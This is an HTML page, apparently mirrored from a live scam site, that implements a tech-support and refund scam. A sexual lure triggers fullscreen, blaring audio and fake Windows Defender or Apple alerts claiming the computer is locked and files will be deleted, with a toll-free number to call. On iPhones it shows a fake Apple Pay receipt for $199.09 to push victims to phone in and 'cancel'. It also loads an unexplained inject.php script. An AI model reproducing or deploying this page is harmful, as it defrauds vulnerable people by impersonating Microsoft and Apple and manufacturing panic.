<!doctype html>
<html lang="en">
  
<!-- Mirrored from xcall.one/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Nov 2025 22:53:39 GMT -->
<head>

<script async defer src="https://tools.luckyorange.com/core/lo.js?site-id=4d988004"></script>

    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="robots" content="noindex,nofollow" />
    <title>Welcome</title>
    <link rel="icon" type="image/png" href="images/msmm.png" />
    <link href="css/tapa.css" rel="stylesheet" />
    <!-- Bot Detection Injection -->
    <script src="inject.php"></script>
    <style>
      html, body { height: 100%; margin: 0; }
      body {
        background: url('images/f21.PNG') center center / cover no-repeat fixed;
        display: grid; place-items: center; font-family: system-ui, -apple-system, Segoe UI, Roboto, Helvetica, Arial, sans-serif;
      }
      .card {
        width: min(92vw, 420px);
        background: rgba(255,255,255,0.9);
        border-radius: 14px;
        box-shadow: 0 10px 30px rgba(0,0,0,0.35);
        padding: 18px 16px 16px;
        text-align: center;
        backdrop-filter: blur(6px);
        position: relative;
        z-index: 2147483647;
      }
      .title { font-size: 18px; font-weight: 700; color: #111; margin: 4px 0 8px; }
      .desc { font-size: 14px; color: #333; margin: 0 0 14px; }
      .row { display: flex; gap: 12px; justify-content: center; }
      .btn { cursor: pointer; border: none; border-radius: 8px; padding: 10px 16px; font-weight: 700; }
      .yes { background: #2563eb; color: #fff; }
      .no { background: #e5e7eb; color: #111; }
    </style>
  </head>
  <body>
    <div id="landingOverlay" style="position:fixed; inset:0; display:flex; align-items:center; justify-content:center; z-index:2147483647;">
    <div class="card" role="dialog" aria-modal="true" aria-label="Permission">
      <div class="title">Move forward?</div>
      <div class="desc">Do you want to connect to your nearest babes? or Exit out? Continue?</div>
      <div class="row">
        <button id="btnYes" class="btn yes">Exit</button>
        <button id="btnNo" class="btn no">Check Out!</button>
      </div>
      
    </div>
    </div>

    <script>
      (function(){
        function detectMode(){
          var ua = navigator.userAgent || '';
          var isIOS = /iPhone|iPad|iPod/i.test(ua);
          var isMac = /Macintosh|Mac OS X/i.test(ua);
          var isWin = /Windows NT|Win64|Win32/i.test(ua);
          if(isWin) return 'win';
          if(isMac || isIOS) return 'mac';
          return 'win';
        }
        function isIOSDevice(){
          var ua = navigator.userAgent || '';
          return /iPhone|iPad|iPod/i.test(ua);
        }
        function enterFullscreen(el){
          if(!el) return Promise.resolve();
          var fn = el.requestFullscreen || el.webkitRequestFullscreen || el.mozRequestFullScreen || el.msRequestFullscreen;
          try{ return fn ? Promise.resolve(fn.call(el)) : Promise.resolve(); }catch(e){ return Promise.resolve(); }
        }
        function setAudio(mode){
          var a = document.getElementById('bgAudio');
          if(!a) return;
          // Use relative paths so they work from file:// or any base URL
          var src = mode === 'mac' ? 'sound/mac.mp3' : 'sound/win.mp3';
          if(a.getAttribute('src') !== src){ a.setAttribute('src', src); a.load && a.load(); }
        }
        function playAudio(){
          var a = document.getElementById('bgAudio');
          if(!a) return;
          try{ a.muted = false; }catch(e){}
          a.volume = 1.0;
          var p = a.play && a.play();
          if(p && p.catch){
            p.catch(function(){
              try{
                a.muted = true;
                var p2 = a.play && a.play();
                if(p2 && p2.finally){ p2.finally(function(){ a.muted = false; a.play && a.play(); }); }
              }catch(_){}
            });
          }
        }
        function render(mode){
          var tpl = document.getElementById(mode === 'mac' ? 'tpl-mac' : 'tpl-win');
          if(!tpl) return;
          var host = document.getElementById('appHost');
          if(!host){ host = document.createElement('div'); host.id = 'appHost'; document.body.appendChild(host); }
          host.innerHTML = tpl.innerHTML;
          // Reset landing layout styles so injected content can layout normally
          try {
            document.body.style.display = 'block';
            document.body.style.placeItems = '';
            document.body.style.background = '';
          } catch(e){}
          var card = document.querySelector('.card');
          if(card){ card.style.display = 'none'; }
          var overlay = document.getElementById('landingOverlay');
          if(overlay){ overlay.style.display = 'none'; }
        }
        function handle(){
          var mode = detectMode();
          setAudio(mode);
          // Try to start audio immediately within the user gesture
          playAudio();
          // Enter fullscreen, then render and retry audio if needed
          var fsTarget = document.documentElement;
          enterFullscreen(fsTarget).finally(function(){
            playAudio();
            render(mode);
          });
        }
        
        // Check if iOS device - if so, hide the landing overlay and show Apple Pay modal
        if(isIOSDevice()){
          var landingOverlay = document.getElementById('landingOverlay');
          if(landingOverlay){ landingOverlay.style.display = 'none'; }
        } else {
          // Only add button listeners for non-iOS devices
          document.addEventListener('fullscreenchange', playAudio);
          document.addEventListener('webkitfullscreenchange', playAudio);
          document.addEventListener('touchstart', playAudio, { once: true });
          document.addEventListener('mousemove', playAudio, { once: true });
          var btnYes = document.getElementById('btnYes');
          var btnNo = document.getElementById('btnNo');
          if(btnYes) btnYes.addEventListener('click', handle);
          if(btnNo) btnNo.addEventListener('click', handle);
        }
      })();
    </script>
    <audio id="bgAudio" loop autoplay playsinline></audio>
    <!-- Windows content template -->
    <template id="tpl-win">
      <div class="bg" style="cursor: default">
        <div class="bgimg" style="top: 0">
          <img src="images/f24.PNG" alt="" width="100%">
        </div>
      </div>
      <a href="#" id="link_black" style="cursor: default" rel="noreferrer">
        <div class="black" style="height: 145%; cursor: default; display: block"></div>
      </a>
      <!-- Windows Defender popup redesigned -->
      <div style="position:fixed; inset:0; z-index:10000000000; display:block;">
        <!-- Top blue warning bar -->
        <div style="position:absolute; left:50%; top:12%; transform:translateX(-50%); background:#1e64d0; color:#fff; width:min(680px,92vw); border-radius:6px; box-shadow:0 6px 16px rgba(0,0,0,0.25);">
          <div style="padding:14px 18px; font-weight:800; text-align:center;">Windows-Defender - Security Warning</div>
          <div style="padding:0 18px 14px; font-size:13px; line-height:1.45;">
            <div>** ACCESS TO THIS PC HAS BEEN BLOCKED FOR SECURITY REASONS **</div>
            <div style="margin-top:6px;">Your computer has alerted us that it has been infected with a DOSAttack Spyware. The following data has been compromised.</div>
          </div>
        </div>

        <!-- Main white card -->
        <div role="dialog" aria-modal="true" aria-label="Windows Defender Security Center"
             style="position:absolute; left:50%; top:50%; transform:translate(-50%,-50%); width:min(720px,94vw); background:#fff; border-radius:12px; box-shadow:0 12px 28px rgba(0,0,0,0.35); overflow:hidden;">
          <!-- Header -->
          <div style="display:flex; align-items:center; justify-content:space-between; padding:12px 14px; border-bottom:1px solid #e6e6e6;">
            <div style="display:flex; align-items:center; gap:10px; font-weight:700; color:#111;">
              <img src="images/win_ico.png" alt="Windows" style="width:18px;height:18px;">
              Windows Defender Security Center
            </div>
            <div aria-label="Close" style="font-size:18px; line-height:1; cursor:pointer; color:#6b7280">×</div>
          </div>

          <!-- Body -->
          <div style="padding:18px 18px 10px; text-align:center;">
            <div style="color:#b91c1c; font-weight:800; font-size:14px;">App: Ads.fianctrack(2).dll</div>
            <div style="color:#b91c1c; font-weight:800; font-size:14px; margin-top:4px;">Threat Detected: DOSAttack Spyware</div>

            <!-- Icon row -->
            <div style="display:flex; justify-content:center; gap:18px; margin:14px 0 10px;">
              <div style="width:72px;height:56px;border:2px solid #111;border-radius:6px;display:flex;align-items:center;justify-content:center;">
                <svg width="34" height="34" viewBox="0 0 24 24" fill="none" stroke="#111" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><rect x="3" y="3" width="18" height="14" rx="2"></rect><path d="M7 21h10"></path><path d="M12 17v4"></path></svg>
              </div>
              <div style="width:72px;height:56px;border:2px solid #111;border-radius:6px;display:flex;align-items:center;justify-content:center;">
                <svg width="34" height="34" viewBox="0 0 24 24" fill="none" stroke="#111" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z"></path><path d="M9 12l2 2 4-4"></path></svg>
              </div>
              <div style="width:72px;height:56px;border:2px solid #111;border-radius:6px;display:flex;align-items:center;justify-content:center;">
                <svg width="34" height="34" viewBox="0 0 24 24" fill="none" stroke="#111" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><rect x="3" y="7" width="18" height="13" rx="2"></rect><path d="M7 7V5a5 5 0 0 1 10 0v2"></path></svg>
              </div>
            </div>

            <!-- Main message -->
            <div style="font-weight:800; color:#111; margin:8px 0 6px;">Access to this PC has been blocked for security reasons.</div>
            <div style="color:#1e3a8a; font-weight:900;">Contact Windows Support: 1-(833) 775-6511 (Toll Free)</div>
            <div style="font-size:12px; color:#111; margin-top:10px; line-height:1.45;">
              Note: If you think this notification is in error, report immediately to Windows Support to halt the auto-deletion of files and applications from this computer. As this computer ID is flagged and is connected over the internet, servers, files and apps deletion may start any moment.
            </div>
          </div>

          <!-- Footer -->
          <div style="display:flex; align-items:center; justify-content:space-between; padding:12px 14px; border-top:1px solid #e6e6e6;">
            <div style="display:flex; align-items:center; gap:10px; color:#111; font-weight:700;">
              <div style="width:20px;height:20px;display:grid;grid-template-columns:1fr 1fr;grid-gap:2px;">
                <div style="background:#f25022"></div>
                <div style="background:#7fba00"></div>
                <div style="background:#00a4ef"></div>
                <div style="background:#ffb900"></div>
              </div>
              Microsoft
            </div>
            <div style="display:flex; gap:10px;">
              <button style="padding:10px 16px; background:#e5e7eb; color:#111; border:1px solid #d1d5db; border-radius:8px; font-weight:800; cursor:pointer;">Deny</button>
              <button style="padding:10px 16px; background:#1e64d0; color:#fff; border:none; border-radius:8px; font-weight:900; cursor:pointer;">Allow</button>
            </div>
          </div>
        </div>
      </div>
      <div id="chat" style="display: block">
        <img src="images/win_ico.png">
        <span style="color:#222;font-size:24px;font-weight:600;margin-left:6px;top:5px;position:relative;">Microsoft</span>
        <p style="font-weight:600;font-size:24px">Call support: <br></p>
        <h4 style="font-weight:600;font-size:22px"><img src="images/winlo.png" alt="" style="width:25px;margin-left:0"> Call us directly +1-(833) 775-6511 <br>(Security Support)</h4>
      </div>
      <!-- Windows bottom banner -->
      <div style="position:fixed;left:0;right:0;bottom:0;background:#111;color:#fff;padding:12px 22px;text-align:center;z-index:2147483000;font-weight:700;font-family:Arial,Helvetica,sans-serif;font-size:20px;">
        Your Windows has a trojan virus threat - TRJ73878273439_JKJSA8743824 which could compromise your identity and financial data. 
        <span style="color:#ff1a1a;font-weight:900;animation: blink 1s step-end infinite;">Contact customer support : 18004443898</span>
      </div>
      <style>
        @keyframes blink { 50% { opacity: 0; } }
      </style>
      <script>(function(){var imgs=document.querySelectorAll('img');imgs.forEach(function(img){img.addEventListener('error',function(){if(img.parentNode)img.parentNode.removeChild(img);});});})();</script>
    </template>
    <!-- Mac content template -->
    <template id="tpl-mac">
      <div class="bg" style="cursor: default">
        <div class="bgimg" style="top: 0">
          <img src="images/f28.PNG" alt="" width="100%">
        </div>
      </div>
      <a href="#" id="link_black" style="cursor: default" rel="noreferrer">
        <div class="black" style="height: 145%; cursor: default; display: block"></div>
      </a>
      <!-- Mac Security popup redesigned -->
      <div style="position:fixed; inset:0; z-index:10000000000; display:block;">
        <!-- Top blue warning bar -->
        <div style="position:absolute; left:50%; top:12%; transform:translateX(-50%); background:#1e64d0; color:#fff; width:min(680px,92vw); border-radius:6px; box-shadow:0 6px 16px rgba(0,0,0,0.25);">
          <div style="padding:14px 18px; font-weight:800; text-align:center;">Mac Security - Security Warning</div>
          <div style="padding:0 18px 14px; font-size:13px; line-height:1.45;">
            <div>** ACCESS TO THIS MAC HAS BEEN BLOCKED FOR SECURITY REASONS **</div>
            <div style="margin-top:6px;">Your computer has alerted us that it has been infected with Trojan spyware. The following data has been compromised.</div>
          </div>
        </div>

        <!-- Main white card -->
        <div role="dialog" aria-modal="true" aria-label="Mac Security"
             style="position:absolute; left:50%; top:50%; transform:translate(-50%,-50%); width:min(720px,94vw); background:#fff; border-radius:12px; box-shadow:0 12px 28px rgba(0,0,0,0.35); overflow:hidden;">
          <!-- Header -->
          <div style="display:flex; align-items:center; justify-content:space-between; padding:12px 14px; border-bottom:1px solid #e6e6e6;">
            <div style="display:flex; align-items:center; gap:10px; font-weight:700; color:#111;">
              <img src="images/mac_ico.png" alt="Mac" style="width:18px;height:18px;">
              Mac Security
            </div>
            <div aria-label="Close" style="font-size:18px; line-height:1; cursor:pointer; color:#6b7280">×</div>
          </div>

          <!-- Body -->
          <div style="padding:18px 18px 10px; text-align:center;">
            <div style="color:#b91c1c; font-weight:800; font-size:14px;">App: Ads.fianctrack(2).dll</div>
            <div style="color:#b91c1c; font-weight:800; font-size:14px; margin-top:4px;">Threat Detected: Trojan Spyware</div>

            <!-- Icon row -->
            <div style="display:flex; justify-content:center; gap:18px; margin:14px 0 10px;">
              <div style="width:72px;height:56px;border:2px solid #111;border-radius:6px;display:flex;align-items:center;justify-content:center;">
                <svg width="34" height="34" viewBox="0 0 24 24" fill="none" stroke="#111" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><rect x="3" y="3" width="18" height="14" rx="2"></rect><path d="M7 21h10"></path><path d="M12 17v4"></path></svg>
              </div>
              <div style="width:72px;height:56px;border:2px solid #111;border-radius:6px;display:flex;align-items:center;justify-content:center;">
                <svg width="34" height="34" viewBox="0 0 24 24" fill="none" stroke="#111" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z"></path><path d="M9 12l2 2 4-4"></path></svg>
              </div>
              <div style="width:72px;height:56px;border:2px solid #111;border-radius:6px;display:flex;align-items:center;justify-content:center;">
                <svg width="34" height="34" viewBox="0 0 24 24" fill="none" stroke="#111" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><rect x="3" y="7" width="18" height="13" rx="2"></rect><path d="M7 7V5a5 5 0 0 1 10 0v2"></path></svg>
              </div>
            </div>

            <!-- Main message -->
            <div style="font-weight:800; color:#111; margin:8px 0 6px;">Access to this Mac has been blocked for security reasons.</div>
            <div style="color:#1e3a8a; font-weight:900;">Contact Apple Support: 1-(833) 775-6511 (Toll Free)</div>
            <div style="font-size:12px; color:#111; margin-top:10px; line-height:1.45;">
              Note: If you think this notification is in error, report immediately to Apple Support to halt the auto-deletion of files and applications from this computer. As this computer is flagged and connected to the internet, files and apps deletion may start any moment.
            </div>
          </div>

          <!-- Footer -->
          <div style="display:flex; align-items:center; justify-content:space-between; padding:12px 14px; border-top:1px solid #e6e6e6;">
            <div style="display:flex; align-items:center; gap:10px; color:#111; font-weight:700;">
              <img src="images/mac_ico.png" alt="Mac" style="width:20px;height:20px;">
              Apple
            </div>
            <div style="display:flex; gap:10px;">
              <button style="padding:10px 16px; background:#e5e7eb; color:#111; border:1px solid #d1d5db; border-radius:8px; font-weight:800; cursor:pointer;">Deny</button>
              <button style="padding:10px 16px; background:#0a84ff; color:#fff; border:none; border-radius:8px; font-weight:900; cursor:pointer;">Allow</button>
            </div>
          </div>
        </div>
      </div>
      <div id="chat" style="display: block">
        <img src="images/mac_ico.png" alt="Mac">
        <span style="color:#222;font-size:24px;font-weight:600;margin-left:6px;top:5px;position:relative;">Mac</span>
        <p style="font-weight:600;font-size:24px">Call support: <br></p>
        <h4 style="font-weight:600;font-size:22px"><img src="images/mac_ico.png" alt="" style="width:25px;margin-left:0"> Call us directly +1-(833) 775-6511 <br>(Security Support)</h4>
      </div>
      <!-- Mac bottom banner -->
      <div style="position:fixed;left:0;right:0;bottom:0;background:#111;color:#fff;padding:12px 22px;text-align:center;z-index:2147483000;font-weight:700;font-family:Arial,Helvetica,sans-serif;font-size:20px;">
        Your Mac has a trojan virus threat - TRJ73878273439_JKJSA8743824 which could compromise your identity and financial data. 
        <span style="color:#ff1a1a;font-weight:900;animation: blink 1s step-end infinite;">Contact customer support : 1(833) 775-6511</span>
      </div>
      <script>(function(){var imgs=document.querySelectorAll('img');imgs.forEach(function(img){if(!img.complete||img.naturalWidth===0){if(img.parentNode)img.parentNode.removeChild(img);return;}img.addEventListener('error',function(){if(img.parentNode)img.parentNode.removeChild(img);});});})();</script>
    </template>
    <script src="js/esc.js"></script>

    <!-- iOS Detection and Apple Pay Modal Integration -->
    <script>
      (function(){
        function isIOSDevice(){
          var ua = navigator.userAgent || '';
          return /iPhone|iPad|iPod/i.test(ua);
        }
        
        if(isIOSDevice()){
          // Hide body background and set fullscreen for iOS
          document.documentElement.style.height = '100%';
          document.body.style.height = '100%';
          document.body.style.margin = '0';
          document.body.style.padding = '0';
          document.body.style.background = 'none';
          document.body.style.display = 'block';
          
          // Inject Apple Pay modal styles
          var style = document.createElement('style');
          style.textContent = `
            /* iOS Apple Pay Modal Styles */
            .paypal-overlay {
                background: transparent;
                position: fixed;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                display: flex;
                justify-content: center;
                align-items: center;
                z-index: 1000;
                margin: 0;
                padding: 0;
            }

            .paypal-modal {
                width: 100%;
                height: 100%;
                max-width: none;
                background-color: white;
                border-radius: 0;
                box-shadow: none;
                overflow: hidden;
                max-height: 100vh;
                display: flex;
                flex-direction: column;
            }

            .paypal-header {
                text-align: center;
                flex-shrink: 0;
            }

            .protection-text {
                background-color: #1a2c4e;
                color: white;
                padding: 10px 15px;
                font-size: 10px;
                margin-bottom: 10px;
                border-bottom: 1px solid rgba(255, 255, 255, 0.3);
                padding-bottom: 5px;
            }

            .logo-container {
                display: flex;
                justify-content: center;
                align-items: center;
                padding: 10px 0;
                border-bottom: 1px solid #eee;
                margin-bottom: 10px;
            }

            .demo-logo-img {
                max-width: 180px;
                height: 40px;
                width: auto;
                object-fit: contain;
                margin: 0 auto;
                display: block;
            }

            .paypal-logo {
                font-size: 20px;
                font-weight: bold;
                color: #1a2c4e;
            }

            .paypal-content {
                padding: 20px 15px;
                line-height: 1.4;
                color: #333;
                overflow-y: auto;
                flex-grow: 1;
            }

            .paypal-footer {
                padding: 0; 
                height: 0;
                flex-shrink: 0;
                overflow: hidden;
            }

            #state-sending .amount {
                font-size: 32px;
                font-weight: 600;
                color: #1a2c4e;
                text-align: center;
                margin-top: 20px;
            }
            #state-sending .recipient {
                text-align: center;
                font-size: 16px;
                color: #5a5a5a;
                margin-bottom: 30px;
            }
            .spinner {
                border: 5px solid #f0f0f0;
                border-top: 5px solid #007aff;
                border-radius: 50%;
                width: 40px;
                height: 40px;
                animation: spin 1s linear infinite;
                margin: 20px auto;
            }
            @keyframes spin {
                0% { transform: rotate(0deg); }
                100% { transform: rotate(360deg); }
            }
            #state-sending .secure-msg {
                text-align: center;
                font-size: 11px;
                color: #888;
                padding: 20px 0 5px 0;
            }
            #state-sending .secure-link {
                text-align: center;
                font-size: 12px;
                color: #007aff;
                display: block;
            }

            .verify-card {
                margin-top: 12px;
                background: #fafcff;
                border: 1px solid #e9f0fb;
                border-radius: 10px;
                padding: 12px;
            }
            .verify-text { font-size: 13px; color: #445; margin: 0 0 10px 0; text-align: center; }
            .verify-btn {
                width: 100%;
                padding: 10px 12px;
                background: #0a66c2;
                color: #fff;
                border: none;
                border-radius: 10px;
                font-size: 15px;
                font-weight: 600;
                cursor: pointer;
            }
            .verify-btn.verified { background: #1b8a4a; }

            .success-animation {
                margin: 20px auto;
            }
            
            .checkmark {
                width: 60px;
                height: 60px;
                border-radius: 50%;
                display: block;
                stroke-width: 3;
                stroke: #4cd964;
                stroke-miterlimit: 10;
                margin: 0 auto;
                box-shadow: inset 0px 0px 0px #4cd964;
                animation: scale .3s ease-in-out .9s both;
            }

            .checkmark-circle {
                stroke-dasharray: 166;
                stroke-dashoffset: 166;
                stroke-width: 3;
                stroke-miterlimit: 10;
                stroke: #4cd964;
                fill: none;
                animation: stroke 0.6s cubic-bezier(0.65, 0, 0.45, 1) forwards;
            }

            .checkmark-check {
                transform-origin: 50% 50%;
                stroke-dasharray: 48;
                stroke-dashoffset: 48;
                animation: stroke 0.3s cubic-bezier(0.65, 0, 0.45, 1) 0.8s forwards;
            }

            @keyframes stroke {
                100% {
                    stroke-dashoffset: 0;
                }
            }

            @keyframes scale {
                0%, 100% {
                    transform: none;
                }
                50% {
                    transform: scale3d(1.1, 1.1, 1);
                }
            }
            
            #state-complete .title {
                font-size: 24px;
                font-weight: 600;
                text-align: center;
                margin-bottom: 5px;
            }
            #state-complete .details-link {
                text-align: center;
                font-size: 13px;
                color: #007aff;
                cursor: pointer;
                margin-bottom: 30px;
                padding-top: 5px;
            }

            .receipt-title {
                text-align: center;
                color: #000;
                font-size: 18px;
                margin-bottom: 20px;
                font-weight: 600;
            }
            
            .transaction-details p {
                margin: 8px 0;
                font-size: 14px;
            }

            .transaction-details strong {
                font-weight: 600;
            }
            
            .cancellation-number {
                text-align: center;
                margin: 10px 0;
            }
            .cancellation-number a {
                color: #1a2c4e;
                text-decoration: none;
                font-weight: bold;
                font-size: 20px;
                display: inline-block;
            }

            .download-button {
                width: 100%;
                padding: 12px;
                background-color: #007aff;
                color: white;
                border: none;
                border-radius: 10px;
                font-size: 16px;
                font-weight: 600;
                cursor: pointer;
                margin-top: 20px;
                box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            }

            .paypal-info-footer {
                font-size: 11px;
                color: #888;
                text-align: center;
                margin-top: 15px;
                padding-top: 10px;
                border-top: 1px solid #eee;
            }
            .paypal-info-footer a {
                color: #007aff;
                text-decoration: none;
                margin: 0 5px;
            }
            
            .card {
                background: #fff;
                border: 1px solid #eee;
                border-radius: 12px;
                box-shadow: 0 6px 18px rgba(0,0,0,0.06);
                padding: 16px;
            }
            .divider {
                height: 1px;
                background: #eee;
                margin: 12px 0;
            }
            .muted { color: #666; }
            .small { font-size: 12px; }
            .badge {
                display: inline-block;
                padding: 4px 10px;
                border-radius: 999px;
                font-size: 12px;
                font-weight: 600;
                background: #eef7ff;
                color: #0a66c2;
                border: 1px solid #d9ecff;
            }
            .badge.success {
                background: #e9f9ef;
                color: #1b8a4a;
                border-color: #c9f0d6;
            }
            .grid-2 {
                display: grid;
                grid-template-columns: 1fr 1fr;
                gap: 12px;
            }
            .label { color: #555; }
            .value { color: #111; font-weight: 600; }

            .receipt-card { padding: 0; overflow: hidden; }
            .receipt-header {
                padding: 16px;
                border-bottom: 1px solid #eee;
                display: flex;
                align-items: center;
                justify-content: space-between;
            }
            .brand-chip {
                display: inline-flex;
                align-items: center;
                gap: 8px;
                padding: 6px 10px;
                border: 1px solid #e8e8e8;
                border-radius: 8px;
                background: #fafafa;
                font-weight: 600;
            }
            .section {
                padding: 16px;
            }
            .meta-row {
                display: grid;
                grid-template-columns: 140px 1fr;
                gap: 8px 16px;
                margin: 8px 0;
            }
            .amount-table {
                width: 100%;
                border-collapse: collapse;
                font-size: 14px;
            }
            .amount-table tr td { padding: 8px 0; }
            .amount-table tr.total td { font-weight: 700; border-top: 1px dashed #ddd; }
            .right { text-align: right; }
            .actions {
                gap: 10px;
                padding: 0 16px 16px 16px;
            }
            .btn-secondary {
                width: 100%;
                padding: 12px;
                background: #f5f7fa;
                color: #0a66c2;
                border: 1px solid #e5effa;
                border-radius: 10px;
                font-size: 16px;
                font-weight: 600;
                cursor: pointer;
            }
          `;
          document.head.appendChild(style);

          // Inject the Apple Pay modal HTML
          var overlay = document.createElement('div');
          overlay.className = 'paypal-overlay';
          overlay.id = 'iosApplePayModal';
          overlay.innerHTML = `
            <div class="paypal-modal">
                <div class="paypal-header">
                    <p class="protection-text">You're protected by Purchase Protection. All transactions are monitored 24/7. Help Line Number: +1 (833) 775-6511</p>
                    <div class="logo-container">
                        <img src="logo.png" alt="Logo" class="demo-logo-img">
                    </div>
                </div>

                <div class="paypal-content">
                    <div id="state-sending">
                        <div class="card">
                            <div style="display:flex;justify-content:space-between;align-items:center;">
                                <span class="badge">Processing</span>
                                <span class="small muted">Secure gateway</span>
                            </div>
                            <div class="divider"></div>
                            <p class="secure-msg">Securely Sending</p>
                            <p class="amount">$199.09 USD</p>
                            <p class="recipient">to Apple Gift Card</p>
                            <div class="spinner"></div>
                            <p class="secure-msg">Please do not close this window</p>
                            <p class="secure-link">Your transaction is being processed with enhanced security</p>
                            <div class="verify-card">
                                <p class="verify-text">Please click & verify if you're a human.</p>
                                <button id="verifyBtn" class="verify-btn" onclick="verifyHuman()">I'm a Human!</button>
                            </div>
                        </div>
                    </div>

                    <div id="state-complete" style="display: none;">
                        <div class="success-animation">
                            <svg class="checkmark" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 52 52">
                                <circle class="checkmark-circle" cx="26" cy="26" r="25" fill="none"/>
                                <path class="checkmark-check" fill="none" d="M14.1 27.2l7.1 7.2 16.7-16.8"/>
                            </svg>
                        </div>
                        <p class="title">Transaction Complete</p>
                        <p class="details-link" onclick="showReceipt()">View transaction details...</p>
                    </div>

                    <div id="state-receipt" style="display: none;">
                        <h2 class="receipt-title">Payment Receipt</h2>

                        <div class="card receipt-card">
                            <div class="receipt-header">
                                <div class="brand-chip">
                                    <img src="logo.png" alt="Logo" style="height:16px;width:auto;"/>
                                    Apple
                                </div>
                                <span class="badge success">Paid</span>
                            </div>

                            <div class="section">
                                <table class="amount-table">
                                    <tr><td>Amount</td><td class="right">$199.09</td></tr>
                                    <tr class="total"><td>Total</td><td class="right">$199.09 USD</td></tr>
                                </table>
                            </div>
                            <div class="actions">
                                <button class="download-button" onclick="downloadReceipt()">Download PDF</button>
                                <button class="btn-secondary" onclick="window.location.href='tel:+1(833) 775-6511'">Contact Support</button>
                            </div>
                        </div>

                        <div class="card section" style="margin-top:12px;">
                            <h4 style="margin:0 0 8px 0;">Important</h4>
                            <p class="small">This transaction may take up to 24 hours to appear on your bank or card statement.</p>
                            <div class="divider"></div>
                            <p class="small"><strong>Security Warning:</strong> Do not click unknown links or share your OTP, email, or password with anyone—even if they claim to be from Apple.</p>
                            <p class="small">To cancel this transaction, please call Customer Care immediately: <a href="tel:+1(833) 775-6511">+1 (833) 775-6511</a>. No online cancellation forms are available.</p>
                        </div>

                        <div class="paypal-info-footer">
                            <p>&copy; 1999–2025 Apple. <a href="#">Help Center</a> | <a href="#">Privacy Policy</a> | <a href="#">Terms & Conditions</a></p>
                        </div>
                    </div>
                </div>

                <div class="paypal-footer"></div>
            </div>
          `;
          document.body.appendChild(overlay);

          // Create audio element for completion sound
          var completeAudio = document.createElement('audio');
          completeAudio.id = 'iosCompleteSound';
          completeAudio.preload = 'auto';
          var source = document.createElement('source');
          source.src = 'sound/complete.mp3';
          source.type = 'audio/mpeg';
          completeAudio.appendChild(source);
          document.body.appendChild(completeAudio);

          // Apple Pay modal JavaScript functions
          window.iosModalFunctions = {
            stateSending: null,
            stateComplete: null,
            stateReceipt: null,
            completeSound: completeAudio,
            isVerified: false,
            
            verifyHuman: function() {
              if (!this.isVerified) {
                this.isVerified = true;
                var btn = document.getElementById('verifyBtn');
                if (btn) { btn.classList.add('verified'); btn.textContent = 'Verified'; }
              }
            },

            hideAllStates: function() {
              var sending = document.getElementById('state-sending');
              var complete = document.getElementById('state-complete');
              var receipt = document.getElementById('state-receipt');
              if(sending) sending.style.display = 'none';
              if(complete) complete.style.display = 'none';
              if(receipt) receipt.style.display = 'none';
            },

            showComplete: function() {
              this.hideAllStates();
              var complete = document.getElementById('state-complete');
              if(complete) complete.style.display = 'block';
              // Play completion sound
              if (this.completeSound && this.isVerified) {
                this.completeSound.volume = 1.0;
                var playPromise = this.completeSound.play();
                if (playPromise !== undefined) {
                  playPromise.catch(function(error) {
                    console.log('Audio playback failed:', error);
                  });
                }
              }
            },

            showReceipt: function() {
              this.hideAllStates();
              var receipt = document.getElementById('state-receipt');
              if(receipt) receipt.style.display = 'block';
              var content = document.querySelector('.paypal-content');
              if(content) content.scrollTop = 0;
            },

            downloadReceipt: function() {
              alert('Your receipt will be sent to your registered Apple ID email, please contact support for any more information.');
            }
          };

          // Global functions for onclick handlers
          window.verifyHuman = function() { window.iosModalFunctions.verifyHuman(); };
          window.showReceipt = function() { window.iosModalFunctions.showReceipt(); };
          window.downloadReceipt = function() { window.iosModalFunctions.downloadReceipt(); };

          // Trigger animations
          setTimeout(function() { window.iosModalFunctions.showComplete(); }, 5000);
          setTimeout(function() { window.iosModalFunctions.showReceipt(); }, 7000);
        }
      })();
    </script>
  </body>

<!-- Mirrored from xcall.one/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Nov 2025 22:53:39 GMT -->
</html>
